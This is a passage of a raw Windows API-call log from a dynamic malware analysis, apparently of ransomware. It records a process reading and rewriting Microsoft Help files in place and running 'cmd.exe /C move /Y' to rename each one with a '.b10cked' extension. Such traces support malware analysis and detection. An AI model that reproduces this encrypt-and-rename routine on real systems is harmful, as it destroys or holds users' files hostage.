lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x158 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.644] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.644] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0197.645] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.645] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0197.645] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0197.645] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xab, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xab, lpOverlapped=0x0) returned 1 [0197.645] SetFilePointer (in: hFile=0x120, lDistanceToMove=-171, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xad [0197.645] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xab, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xab, lpOverlapped=0x0) returned 1 [0197.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATH.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0197.650] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATH.14.1033.hxn", cchWideChar=23, lpMultiByteStr=0x1328794, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.INFOPATH.14.1033.hxn", lpUsedDefaultChar=0x0) returned 23 [0197.650] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x158 [0197.650] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.651] CloseHandle (hObject=0x120) returned 1 [0197.651] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATH.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN") returned 0x27 [0197.652] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.653] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATH.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa18, dwThreadId=0xc98)) returned 1 [0197.667] CloseHandle (hObject=0x1b4) returned 1 [0197.667] CloseHandle (hObject=0x120) returned 1 [0197.667] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.667] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.667] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.667] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.667] ReleaseMutex (hMutex=0xf8) returned 1 [0197.667] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.667] ReleaseMutex (hMutex=0xf8) returned 1 [0197.667] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.667] ReleaseMutex (hMutex=0xf8) returned 1 [0197.667] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.667] ReleaseMutex (hMutex=0xf8) returned 1 [0197.667] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.infopatheditor.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25445698259) returned 1 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.668] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x17c [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.669] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.669] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xbd, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xbd, lpOverlapped=0x0) returned 1 [0197.670] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.670] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xbd, lpOverlapped=0x0) returned 1 [0197.671] SetFilePointer (in: hFile=0x120, lDistanceToMove=-189, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbf [0197.671] ReadFile (in: hFile=0x120, lpBuffer=0x12ea7f8, nNumberOfBytesToRead=0xbd, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesRead=0x12ec08*=0xbd, lpOverlapped=0x0) returned 1 [0197.671] SetFilePointer (in: hFile=0x120, lDistanceToMove=-189, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xbf [0197.671] WriteFile (in: hFile=0x120, lpBuffer=0x12ea7f8*, nNumberOfBytesToWrite=0xbd, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12ea7f8*, lpNumberOfBytesWritten=0x12ec1c*=0xbd, lpOverlapped=0x0) returned 1 [0197.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATHEDITOR.14.1033.hxn", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0197.675] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.INFOPATHEDITOR.14.1033.hxn", cchWideChar=29, lpMultiByteStr=0x132f75c, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.INFOPATHEDITOR.14.1033.hxn", lpUsedDefaultChar=0x0) returned 29 [0197.675] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x17c [0197.675] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.675] CloseHandle (hObject=0x120) returned 1 [0197.676] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.INFOPATHEDITOR.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN") returned 0x27 [0197.676] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.677] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSINFO~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.INFOPATHEDITOR.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc5c, dwThreadId=0xcd0)) returned 1 [0197.683] CloseHandle (hObject=0x1b4) returned 1 [0197.683] CloseHandle (hObject=0x120) returned 1 [0197.684] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.684] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.684] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.684] ReleaseMutex (hMutex=0xf8) returned 1 [0197.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.684] ReleaseMutex (hMutex=0xf8) returned 1 [0197.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.684] ReleaseMutex (hMutex=0xf8) returned 1 [0197.684] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.684] ReleaseMutex (hMutex=0xf8) returned 1 [0197.684] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.msaccess.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25447403512) returned 1 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.685] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.686] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x158 [0197.686] SetFilePointer (in: hFile=0x120, 